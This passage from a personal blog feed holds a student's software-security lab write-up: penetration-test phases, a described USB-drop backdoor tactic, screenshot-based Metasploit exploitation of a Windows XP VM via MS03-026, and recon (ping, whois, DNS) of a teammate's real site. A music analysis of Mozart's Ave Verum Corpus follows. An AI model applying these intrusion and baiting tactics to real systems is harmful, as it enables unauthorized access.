上传销售数据和客户订单。</p><p>社会工程学跟一般的侦察工作一样，都需要花费时间进行钻研。不是所有人都适合当社会工程学攻击者的。想要获得成功，你首先得足够自信、对情况的把握要到位，然后还得灵活多变，随时准备“开溜”。如果是在电话里进行社会工程学攻击，最好是手头备好各种详尽、清楚易辨的信息小抄，以免被问到一些不好回答的细节。</p><p>另外一种社会工程学攻击方陆是把优盘或光盘落在目标公司里。优盘需要扔到目标公司内部或附近多个地方，例如停车场、大厅、厕所或员工办公桌等，都是“遗落”的好地方。大部分人出于本性，在捡到优盘或光盘之后，会将其插入电脑或放进光驱，查看里面是什么内容。而这种情况下，优盘和光盘里都预先装载了自执行后门程序，当优盘或光盘放入电脑的时候，就会自动运行。后门程序能够绕过防火墙，并拨号至攻击者的电脑，此时目标暴露无遗，攻击者也因此获得一条进入公司内部的通道。</p><h5 id="3-威胁建模阶段"><a href="#3-威胁建模阶段" class="headerlink" title="3. 威胁建模阶段"></a>3. 威胁建模阶段</h5><p>在搜集到充分的情报信息之后，渗透测试团队的成员们停下敲击键盘，大家聚到一起针对获取的信息进行威胁建模（Threat Modeling）与攻击规划。这是渗透测试过程中非常重要，但很容易被忽视的一个关键点。</p><p>大部分情况下，就算是小规模的侦察工作也能收获海量数据。信息收集过程结束之后，对目标应该就有了十分清楚的认识，包括公司组织构架，甚至内部部署的技术。</p><h5 id="4-漏洞分析阶段"><a href="#4-漏洞分析阶段" class="headerlink" title="4. 漏洞分析阶段"></a>4. 漏洞分析阶段</h5><p>在确定出最可行的攻击通道之后，接下来需要考虑该如何取得目标系统的访问控制权，即漏洞分析（Vulnerability Analysis）阶段。</p><p>在该阶段，渗透测试者需要综合分析前几个阶段获取并汇总的情报信息，特别是安全漏洞扫描结果、服务查点信息等，通过搜索可获取的渗透代码资源，找出可以实施渗透攻击的攻击点，并在实验环境中进行验证。在该阶段，高水平的渗透测试团队还会针对攻击通道上的一些关键系统与服务进行安全漏洞探测与挖掘，期望找出可被利用的未知安全漏洞，并开发出渗透代码，从而打开攻击通道上的关键路径。</p><h5 id="5-渗透攻击阶段"><a href="#5-渗透攻击阶段" class="headerlink" title="5. 渗透攻击阶段"></a>5. 渗透攻击阶段</h5><p>渗透攻击（Exploitation）是渗透测试过程中最具有魅力的环节。在此环节中，渗透测试团队需要利用他们所找出的目标系统安全漏洞，来真正入侵系统当中，获得访问控制权。</p><p>渗透攻击可以利用公开渠道可获取的渗透代码，但一般在实际应用场景中，渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击，并需要挫败目标网络与系统中实施的安全防御措施，才能成功达成渗透目的。在黑盒测试中，渗透测试者还需要考虑对目标系统检测机制的逃逸，从而避免造成目标组织安全响应团队的警觉和发现。</p><h5 id="6-后渗透攻击阶段"><a href="#6-后渗透攻击阶段" class="headerlink" title="6. 后渗透攻击阶段"></a>6. 后渗透攻击阶段</h5><p>后渗透攻击（Post Exploitation）是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节。前面的环节可以说都是在按部就班地完成非常普遍的目标，而在这个环节中，需要渗透测试团队根据目标组织的业务经营模式、保护资产形式与安全防御计划的不同特点，自主设计出攻击目标，识别关键基础设施，并寻找客户组织最具价值和尝试安全保护的信息和资产，最终达成能够对客户组织造成最重要业务影响的攻击途径。</p><p>与渗透攻击阶段的区别在于，后渗透攻击更加重视在渗透进去目标之后的进一步的攻击行为。后渗透攻击主要支持在渗透攻击取得目标系统远程控制权之后，在受控系统中进行各式各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、实施跳板攻击等。 </p><h5 id="7-报告阶段"><a href="#7-报告阶段" class="headerlink" title="7. 报告阶段"></a>7. 报告阶段</h5><p>渗透测试过程最终向客户组织提交，取得认可并成功获得合同付款的就是一份渗透测试报告（Reporting）。这份报告凝聚了之前所有阶段之中渗透测试团队所获取的关键情报信息、探测和发掘出的系统安全漏洞、成功渗透攻击的过程，以及造成业务影响后果的攻击途径，同时还要站在防御者的角度上，帮助他们分析安全防御体系中的薄弱环节、存在的问题，以及修补与升级技术方案。</p><h4 id="第一步：漏洞扫描"><a href="#第一步：漏洞扫描" class="headerlink" title="第一步：漏洞扫描"></a><strong>第一步：漏洞扫描</strong></h4><p>使用nmap发现存活主机：<br><img src="C:\Users\lenovo\Desktop\image-20250102141241840.png" alt="image-20250102141241840"></p><p>端口扫描：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102141356979.png" alt="image-20250102141356979"></p><p>指纹探测：<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102141505796.png" alt="image-20250102141505796"></p><p>是win XP</p><p>在进行渗透测试之前，需要进行漏洞扫描。 Nessus提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image002.gif" alt="img"></p><h4 id="第二步：启动Metasploit渗透攻击"><a href="#第二步：启动Metasploit渗透攻击" class="headerlink" title="第二步：启动Metasploit渗透攻击"></a><strong>第二步：启动Metasploit</strong>渗透攻击</h4><p>Metasploit是一个开源的渗透测试框架软 件，也是一个逐步发展成熟的漏洞研究与渗透代码开发平台，支持整个渗透测试过程的安全技术集成开发与应用环境。</p><p><strong><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image004.gif" alt="img"></strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image006.gif" alt="img"></p><p>点入第四个混合漏洞</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image008.gif" alt="img"></p><h5 id="MS06-040"><a href="#MS06-040" class="headerlink" title="MS06-040"></a>MS06-040</h5><p> Vulnerability in Server Service Could Allow Remote Code Execution ：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image010.jpg" alt="img"></p><p>在msf中找找</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image012.gif" alt="img"></p><p>装载并配置：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image014.gif" alt="img"></p><p>没打通：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image016.gif" alt="img"></p><p>查了一下原因，在尝试匿名SMB登录时，被拒绝了</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image018.gif" alt="img"><br> 更换其他的攻击模块：</p><h5 id="MS03-026"><a href="#MS03-026" class="headerlink" title="MS03_026"></a><strong>MS03_026</strong></h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image020.gif" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image022.gif" alt="img"></p><p>攻击：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image024.gif" alt="img"></p><p>攻击成功：<br> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image026.gif" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image028.gif" alt="img"></p><h3 id="四．-心得体会-2"><a href="#四．-心得体会-2" class="headerlink" title="四． 心得体会"></a>四． 心得体会</h3><p>了解了一下ms03_026这个漏洞：</p><p>CVE-2003-0352漏洞，该漏洞由lds-pl.net研究组于2003年发现，影响包括Windows XP、Windows NT、Windows 2003等在内的多个微软操作系统版本。</p><p>漏洞源于微软RPC框架在处理<strong>TCP&#x2F;IP信息交换过程中的畸形消息时未能正确处理，导致缓冲区溢出</strong>。</p><p>攻击目标：使用DCOM接口的Windows RPC 服务器</p><p>微软修改dcerpc框架后形成自己的RPC框架来处理进程间的通信。微软的RPC框架在处理TCP&#x2F;IP信息交换过程中存在的畸形消息时，未正确处理，导致缓冲区溢出漏洞；此漏洞影响使用RPC框架的DCOM接口，DCOM接口用来处理客户端机器发送给服务器的DCOM对象**请求，如UNC路径</p><h3 id="想按照上课讲的看看我队友的站：h-ck"><a href="#想按照上课讲的看看我队友的站：h-ck" class="headerlink" title="想按照上课讲的看看我队友的站：h@ck"></a>想按照上课讲的看看我队友的站：<a href="https://wz0beu.cn/">h@ck</a></h3><h4 id="被动信息收集："><a href="#被动信息收集：" class="headerlink" title="被动信息收集："></a>被动信息收集：</h4><p>现在已知域名：<a href="https://wz0beu.cn/">https://wz0beu.cn/</a></p><h5 id="搜索引擎："><a href="#搜索引擎：" class="headerlink" title="搜索引擎："></a>搜索引擎：</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102135329079.png" alt="image-20250102135329079"></p><h5 id="Site指令："><a href="#Site指令：" class="headerlink" title="Site指令："></a>Site指令：</h5><p>IP地址查询：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">C:\<span class="title">Users</span>\<span class="title">lenovo</span>&gt;<span class="title">ping</span> <span class="title">www.wz0beu.cn</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">正在 <span class="title">Ping</span> <span class="title">www.wz0beu.cn</span> [124.223.53.252] 具有 32 字节的数据:</span></span><br><span class="line"><span class="function">来自 124.223.53.252 的回复: 字节=32 时间=30<span class="title">ms</span> <span class="title">TTL</span>=113</span></span><br><span class="line"><span class="function">来自 124.223.53.252 的回复: 字节=32 时间=30<span class="title">ms</span> <span class="title">TTL</span>=113</span></span><br><span class="line"><span class="function">来自 124.223.53.252 的回复: 字节=32 时间=29<span class="title">ms</span> <span class="title">TTL</span>=113</span></span><br><span class="line"><span class="function">来自 124.223.53.252 的回复: 字节=32 时间=30<span class="title">ms</span> <span class="title">TTL</span>=113</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">124.223.53.252 的 <span class="title">Ping</span> 统计信息:</span></span><br><span class="line"><span class="function">    数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，</span></span><br><span class="line"><span class="function">往返行程的估计时间(以毫秒为单位):</span></span><br><span class="line"><span class="function">    最短 = 29<span class="title">ms</span>，最长 = 30<span class="title">ms</span>，平均 = 29<span class="title">ms</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span></span><br></pre></td></tr></table></figure><p>CDN(Content Delivery Network,即内容分发网络)基本原理是广泛采用各种缓存服务器，将这些缓存服务器分布到用户访问相对集中的地区或网络中，在用户访问网站时，利用全局负载技术将用户的访问指向距离最近的工作正常的缓存服务器上，由缓存服务器直接响应用户请求。所以上面得到的IP不是真实web服务器的IP地址</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">C:\<span class="title">Users</span>\<span class="title">lenovo</span>&gt;<span class="title">ping</span> <span class="title">wz0beu.cn</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">正在 <span class="title">Ping</span> <span class="title">wz0beu.cn</span> [101.42.90.91] 具有 32 字节的数据:</span></span><br><span class="line"><span class="function">来自 101.42.90.91 的回复: 字节=32 时间=9<span class="title">ms</span> <span class="title">TTL</span>=115</span></span><br><span class="line"><span class="function">来自 101.42.90.91 的回复: 字节=32 时间=9<span class="title">ms</span> <span class="title">TTL</span>=115</span></span><br><span class="line"><span class="function">来自 101.42.90.91 的回复: 字节=32 时间=10<span class="title">ms</span> <span class="title">TTL</span>=115</span></span><br><span class="line"><span class="function">来自 101.42.90.91 的回复: 字节=32 时间=10<span class="title">ms</span> <span class="title">TTL</span>=115</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">101.42.90.91 的 <span class="title">Ping</span> 统计信息:</span></span><br><span class="line"><span class="function">    数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，</span></span><br><span class="line"><span class="function">往返行程的估计时间(以毫秒为单位):</span></span><br><span class="line"><span class="function">    最短 = 9<span class="title">ms</span>，最长 = 10<span class="title">ms</span>，平均 = 9<span class="title">ms</span></span></span><br></pre></td></tr></table></figure><p>去掉www，可以得到真实IP</p><h5 id="whois信息收集："><a href="#whois信息收集：" class="headerlink" title="whois信息收集："></a>whois信息收集：</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/82dd9d1edaf1c5719fc1f2b5808886ce.png" alt="img"></p><p>当然这个也能搜：<a href="https://whois.chinaz.com/wz0beu.cn">wz0beu.cn的Whois信息 - 站长工具</a></p><h5 id="DNS信息收集："><a href="#DNS信息收集：" class="headerlink" title="DNS信息收集："></a>DNS信息收集：</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102140150774.png" alt="image-20250102140150774"></p><h4 id="主动信息收集："><a href="#主动信息收集：" class="headerlink" title="主动信息收集："></a>主动信息收集：</h4><h5 id="端口扫描："><a href="#端口扫描：" class="headerlink" title="端口扫描："></a>端口扫描：</h5><h5 id="指纹探测："><a href="#指纹探测：" class="headerlink" title="指纹探测："></a>指纹探测：</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102141902324.png" alt="image-20250102141902324"></p><p>Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device</p><h5 id="web指纹探测："><a href="#web指纹探测：" class="headerlink" title="web指纹探测："></a>web指纹探测：</h5><p>这里是一些常见的错误页面：</p><p>Apache：</p><p><img src="https://tse1-mm.cn.bing.net/th/id/OIP-C.ym1ckETlYl85I7jTdweiFgHaDW?w=298&h=158&c=7&r=0&o=5&pid=1.7" alt="apache 错误页面 的图像结果"></p><p>IIS：</p><p><img src="https://img2022.cnblogs.com/blog/775247/202205/775247-20220505171104032-1338715950.png" alt="IIS报错"></p><p>Nginx</p><p><img src="https://img2018.cnblogs.com/q/13075/201901/13075-20190125124016999-2059581696.png" alt="nginx "></p><p>xp:</p><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20250102142837164.png" alt="image-20250102142837164"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;软件安全实验1-6详解&quot;&gt;&lt;a href=&quot;#软件安全实验1-6详解&quot; class=&quot;headerlink&quot; title=&quot;软件安全实验1-6详解&quot;&gt;&lt;/a&gt;软件安全实验1-6详解&lt;/h1&gt;&lt;p&gt;太喜欢这门课，而且是越写实验越好玩！找到了《软件安全：漏洞利用及渗透</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title></title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/21/0ctf-2024-reverse/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/21/0ctf-2024-reverse/</id>
    <published>2024-12-21T07:43:19.542Z</published>
    <updated>2024-12-21T14:25:43.981Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0CTF-2024-Reverse"><a href="#0CTF-2024-Reverse" class="headerlink" title="0CTF 2024 | Reverse"></a>0CTF 2024 | Reverse</h1>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0CTF-2024-Reverse&quot;&gt;&lt;a href=&quot;#0CTF-2024-Reverse&quot; class=&quot;headerlink&quot; title=&quot;0CTF 2024 | Reverse&quot;&gt;&lt;/a&gt;0CTF 2024 | Reverse&lt;/h1&gt;</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>《Mozart：Ave Verum Corpus》的合唱作品分析与审美体会</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/18/mozart-ave-verum-corpus-de-he-chang-zuo-pin-fen-xi-yu-shen-mei-ti-hui/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/18/mozart-ave-verum-corpus-de-he-chang-zuo-pin-fen-xi-yu-shen-mei-ti-hui/</id>
    <published>2024-12-18T15:15:24.103Z</published>
    <updated>2024-12-19T13:06:54.052Z</updated>
    
    <content type="html"><![CDATA[<h2 id="《Ave-Verum-Corpus》合唱作品分析与审美体会"><a href="#《Ave-Verum-Corpus》合唱作品分析与审美体会" class="headerlink" title="《Ave Verum Corpus》合唱作品分析与审美体会"></a>《Ave Verum Corpus》合唱作品分析与审美体会</h2><h3 id="Ⅰ-作品简介"><a href="#Ⅰ-作品简介" class="headerlink" title="Ⅰ 作品简介"></a>Ⅰ 作品简介</h3><p><strong>《Ave Verum Corpus》</strong> 是沃尔夫冈·阿马德乌斯·莫扎特（Wolfgang Amadeus Mozart）于1791年6月为合唱与小型乐队创作的一部圣咏作品，K.618号。这首作品被认为是莫扎特晚年创作巅峰的代表之一，尽管篇幅短小，却以其极高的艺术价值和深刻的宗教情感闻名于世。作品采用了D大调，四声部合唱与弦乐小型乐队共同完成，是莫扎特为基督圣体节创作的一首神圣而安宁的圣咏。</p><h3 id="Ⅱ-调性调式与和声特点"><a href="#Ⅱ-调性调式与和声特点" class="headerlink" title="Ⅱ 调性调式与和声特点"></a>Ⅱ 调性调式与和声特点</h3><p>整首曲子用缓慢的速度、明亮柔和的大调，带给人平安、充满盼望的感觉。</p><p>虽然从头至尾，都是两个升号的D大调，<strong>但每八小节都有临时转调，共转了三次，是用临时升、降记号表明的。</strong></p><ul><li>开篇D大调第一转位、第二转位、原位铺开，渐强展开整个叙述</li></ul><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192417773.png" alt="image-20241219192417773" style="zoom: 33%;" /><ul><li>第一段：第三小节至第十小节，D大调，优美而平静的旋律与和声，叙述耶稣的降世。</li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192606159.png" alt="image-20241219192606159" style="zoom: 33%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192619681.png" alt="image-20241219192619681" style="zoom: 33%;" /></p><ul><li><p>第二段：第十一小节至第二十一小节，直接转成A大调，升高了五度，并用了切分音和长达五拍的高音，描述耶稣被钉死在十字架上，其中第十、十一、十五小节中，出现三次升G(G#)，这是转成A大调的关键音。属和弦</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192657658.png" alt="image-20241219192657658" style="zoom: 35%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192749557.png" alt="image-20241219192749557" style="zoom:35%;" /></p></li><li><p>第三段：第二十二小节至二十九节，由F大调转成d小调，把D大调中的两个升号(F#，C#)还原，更出现了降B，变为轻柔的小调和暗淡的色彩，描绘耶稣的肋旁流出的血和水。（降B已经很明显了）</p></li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192826535.png" alt="image-20241219192826535" style="zoom:30%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192840696.png" alt="image-20241219192840696" style="zoom:30%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192853174.png" alt="image-20241219192853174" style="zoom:30%;" /></p><ul><li>第三十小节停在<strong>D大调和d小调共有的属和弦</strong>上，使第四段三十小节很自然地转到D大调主和弦上，宣告清晰而明亮的D大调重新出现，耶稣身体的擘开，为人们带来了救赎和盼望，直到万代。因耶稣不变的爱和永恒的爱，乐曲再度欢欣。一转！欸！#G回一下A大调——</li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219192924864.png" alt="image-20241219192924864" style="zoom: 33%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219193152029.png" alt="image-20241219193152029" style="zoom:30%;" /></p><ul><li>第三十三小节，用了长达六拍的音和最响亮的高音，达到高潮。最后，逐渐减弱，用很轻的声音结束，使人回到静默和无限的敬畏之中。</li></ul><p>将末，EF的颤音更增添一份美感~</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219193216145.png" alt="image-20241219193216145" style="zoom: 40%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241219193229156.png" alt="image-20241219193229156" style="zoom:40%;" /></p><h3 id="Ⅲ旋律风格与节奏特点"><a href="#Ⅲ旋律风格与节奏特点" class="headerlink" title="Ⅲ旋律风格与节奏特点"></a>Ⅲ旋律风格与节奏特点</h3><p><strong>旋律风格</strong><br> 莫扎特在此作品中的旋律以线条流畅、内敛含蓄为主要特征。表现出一种极具宗教性的纯净美感。例如，开篇的“Ave Verum Corpus”，旋律平稳上升至高点后逐渐下降，传递出一种恭敬而虔诚的情感。</p><p><strong>节奏特点</strong><br> 作品的节奏平稳，以四分音符与八分音符为主要构成，偶尔点缀附点节奏，使音乐更富于灵动性。值得一提的是，节奏的设置与歌词的韵律紧密结合，体现了音乐与文本的完美统一。</p><h3 id="Ⅳ-织体特点"><a href="#Ⅳ-织体特点" class="headerlink" title="Ⅳ 织体特点"></a>Ⅳ 织体特点</h3><p>作品采用<strong>主调织体</strong>为主，四声部合唱与弦乐伴奏紧密配合，织体层次分明。合唱部分通常以和弦式和对位式织体交替出现，形成如下特点：</p><p><strong>和弦式织体</strong><br>在如开篇的“Ave Verum Corpus”段落中，四声部齐唱，以和弦方式呈现旋律，突出歌词的庄重与整体性。</p><p><strong>对位式织体</strong><br>在“Cujus latus perforatum”部分，采用了简洁的模仿对位技法，赋予音乐更多的层次感，同时增强了情感的流动性。</p><h3 id="Ⅴ-配器法与演唱技术"><a href="#Ⅴ-配器法与演唱技术" class="headerlink" title="Ⅴ 配器法与演唱技术"></a>Ⅴ 配器法与演唱技术</h3><p><strong>配器法</strong><br>配器以弦乐组为主，辅以简洁的管风琴（我看众视频都是管风琴居多）伴奏。弦乐的功能不仅仅是提供和声支撑，更在于营造一种柔和而庄重的氛围。尤其是低音提琴与大提琴的配合，使作品的低声部极具厚重感。</p><p><strong>演唱技术</strong><br>合唱部分要求演唱者具备较好的音准与和声平衡能力，尤其是在和弦式织体部分，各声部需保持稳定的音准；而在对位织体中，每个声部的独立性必须清晰呈现。</p><h3 id="Ⅵ-总结"><a href="#Ⅵ-总结" class="headerlink" title="Ⅵ 总结"></a>Ⅵ 总结</h3><p><strong>《Ave Verum Corpus》</strong> 是一部典雅、深沉、充满人文关怀的合唱作品。它通过简洁的音乐语言、细腻的情感表达和严谨的结构安排，向人们展示了莫扎特对于生命、信仰与艺术的深刻理解。对于演唱者而言，这首作品考验的不仅是技术，更是对音乐内涵的理解与表达能力。而作为聆听者，这部作品让我感受到宗教音乐独特的力量，那是一种超越语言的心灵洗礼。</p><p>作为莫扎特晚期的作品，《Ave Verum Corpus》虽然篇幅短小，却展示了莫扎特对于人性与宗教的深刻理解。这种简洁而不简单的创作手法令人叹服。</p><p><strong>情感的纯净与深刻</strong>。全曲没有一丝炫技或多余的修饰，而是通过最简单的音乐语言直指人心。在聆听的过程中，仿佛置身于一片纯净的圣光之下，感受到莫扎特对生命与信仰的深切思考。</p><p><strong>结构的严谨与流畅</strong>。尽管全曲仅有数分钟，但在结构安排上极其严谨。无论是主题旋律的安排还是和声与织体的变化，都体现出大师的匠心独运。</p><p><strong>情感的动态处理</strong>。莫扎特在处理歌词与音乐时，注重情感的层次感。例如从“Cujus latus perforatum”（第三部分）的紧张到“O Jesu dulcis”的温暖柔和，展现了情感的逐层递进，使作品更具戏剧性。</p><p>这正是莫扎特音乐的魅力所在：<strong>无论时代如何变化，它始终能以其纯净、真挚的特质打动人心，成为人类音乐艺术宝库中不可或缺的一部分。</strong></p><h3 id="Ⅶ-附录"><a href="#Ⅶ-附录" class="headerlink" title="Ⅶ 附录"></a>Ⅶ 附录</h3><p>戴上耳机，搜索点入，听只觉得耳熟；翻找翻找，竟然是EVA中曾引用的场景背景曲（噫？）<br>竟不曾想因为这次课程的作业，让我对这首曲子越挖掘越入迷（命运！）<br>看youtube上有人模拟四声部合并轨演绎这首，试了试，很好，低的唱下不去，高的唱不稳当。那试试钢琴部分，嗯…或许练习太少，或许也是理解不够，中间变调、二次变调部分总觉得怪怪的。<br>曲谱落在了钢琴上，下课去取的时候偶然问了问温老师，竟有了令人惊喜的答复——</p><p>识谱即弹，并精准的分析着不同部分的旋律。D大调为主调，A大调为转调，”一种探索！“，之后是更高一些的D小调，再往上够！欸再回来，但是第四部分，没有完全回来，留了个悬疑，让叙事更加丰富；最后是回归。回归的尾巴，还带着颤音，更有一番清新感，实在美丽！</p><p>单曲循环了好几天，是和谐是宁静，牛逼！</p><p>以下是不同的演绎版本：</p><p><a href="https://www.bilibili.com/video/BV1KL41137LP/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">Víkingur Ólafsson&#x2F; Mozart: Ave verum corpus, K. 618 (Transcr. Liszt）_哔哩哔哩_bilibili</a>钢琴独奏</p><p><a href="https://www.bilibili.com/video/BV1uK411U7nv/?spm_id_from=333.337.search-card.all.click">【大提琴四重奏】莫扎特”Ave verum corpus”, K.618_哔哩哔哩_bilibili</a>大提琴！</p><p><a href="https://www.bilibili.com/video/BV1Rr4y1N7xU?spm_id_from=333.788.recommend_more_video.-1&vd_source=e0d38f3b7f181fb7b70017110ea5b176">ave verum corpus_哔哩哔哩_bilibili</a>战争与ave verum corpus女高音完美配合</p><p><a href="https://www.bilibili.com/video/BV1QD4y1p78f/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">莫扎特《圣体颂》巴松版 Mozart Ave verum corpus K.618 for Bassoon_哔哩哔哩_bilibili</a>巴松管（！</p><p><a href="https://www.bilibili.com/video/BV1GD42177ib/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">經文歌 Ave verum corpus 英國管獨奏 Albrecht Mayer (Mozart-Spindler)_哔哩哔哩_bilibili</a>单簧管 （emm</p><p><a href="https://www.bilibili.com/video/BV11v4y1W7oX/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">【篳篥と大篳篥】Ave verum corpus, K.618 (Mozart, Wolfgang Amadeus)「アヴェ・ヴェルム・コルプス」【一人二役】_哔哩哔哩_bilibili</a>大筚篥（？</p><p><a href="https://www.bilibili.com/video/BV1wf4y1m7gj/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">【搬运】《逃生2》大结局插曲 - Ave Verum Corpus Mozart (Ending cutscene)_哔哩哔哩_bilibili</a></p><p><a href="https://www.bilibili.com/video/BV1EJ411E72G/?spm_id_from=333.337.search-card.all.click&vd_source=e0d38f3b7f181fb7b70017110ea5b176">莫扎特《圣体颂》Ave Verum Corpus | Pete Smyser_哔哩哔哩_bilibili</a>古典吉他，摇篮曲一样</p><p>以下是一个看着好古老的谱子</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/6252d7cff87324c135c7d520077f7ab.png" alt="6252d7cff87324c135c7d520077f7ab"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/6ed485c37ad76bf8ebb460977b27ef1.png" alt="6ed485c37ad76bf8ebb460977b27ef1"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/9580d514f2556cf063a0fe6b1ee925f.png" alt="9580d514f2556cf063a0fe6b1ee925f"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/5722ee935b7846ce6455fae91e58d08.png"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/38540516faa42058457b2374b337934.png" alt="38540516faa42058457b2374b337934"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;《Ave-Verum-Corpus》合唱作品分析与审美体会&quot;&gt;&lt;a href=&quot;#《Ave-Verum-Corpus》合唱作品分析与审美体会&quot; class=&quot;headerlink&quot; title=&quot;《Ave Verum Corpus》合唱作品分析与审美体会&quot;&gt;&lt;/a</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>计网往年题解答</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/16/ji-wang/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/16/ji-wang/</id>
    <published>2024-12-16T13:53:18.045Z</published>
    <updated>2024-12-22T16:24:53.878Z</updated>
    
